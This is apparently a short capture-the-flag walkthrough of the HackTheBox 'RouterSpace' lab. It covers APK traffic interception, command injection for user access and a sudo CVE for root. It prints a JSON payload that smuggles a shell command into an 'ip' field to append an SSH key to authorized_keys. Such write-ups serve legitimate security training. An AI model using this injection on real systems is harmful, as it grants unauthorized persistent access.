Engagement flow
Enumeration
Port discovery
Web enumeration
apk download
Browsing to the website we see options for a download and a get started now.
We download the provided apk.
From this we install and run anbox on our target. Once anbox is opened, we have to install the actual .apk.
User
We have to change our network information in order to intercept and proxy the request with burp suite.
adb shell settings put global http_proxy 192.168.250.1:8080
This did not work. After some review I realized the host was routerspace.htb and this needed to be added to the /etc/hosts file.
I was not able to gain a reverse shell so I injected my SSH key instead.
{"ip":"0.0.0.0 | echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCu8ID9aG93wVDfA3M7x6McWMDGvzVC4LlWjoDZtJ33Xpzi7483Dxt4+WczJdCAlWJKw1In4Orc1QcINCHBy6hK0UteKU3OevHn9IhpyoZF1FsFi/zo6brldA4pSTOBBT6zDf3VzVtgEwkRe5YaLZLMoD/lBvYLKyboJcQ90zTwBcNEL029b5a1YLx/ZZcTgaZEOKrC7rck9l3uu9rW8pqGTrm/kkV7ad+CrH4tHil4uNnkVSQp6BA1oQh1xAuCvq494zZu5Z+sqOsHzMKp7U4ZvAG1vKxZdMSyKYp13kftK2Yj+dWDpIYZZqy0tqz1duSmgd7LK+dxc7wGOV6+FPqp4YcnY4xfnbKwh1WPZnL7EvYIzHqI4IYww7IMYBw2R+/+CtQpFj+rmX0FHUEPpu9YSjvC4o1N7pzo6/F8pIn7HjEiOg1vcwotCF3RM5UG2fkX0PdHJTXH9EL8lm351qkilf00ZFsZ8ovlvVtoIdcN0mwuh9I/1GeyDey2kmYC9c= kali@kali' >> /home/paul/.ssh/authorized_keys"}
Root
From here we are not able to get the linpeas script uploaded so we pivot and enumerate manually. Checking the Sudo version and researching this version shows us a known CVE.
We copy the 3 files onto our target machine. and run make followed by exploit and we are root!
Comments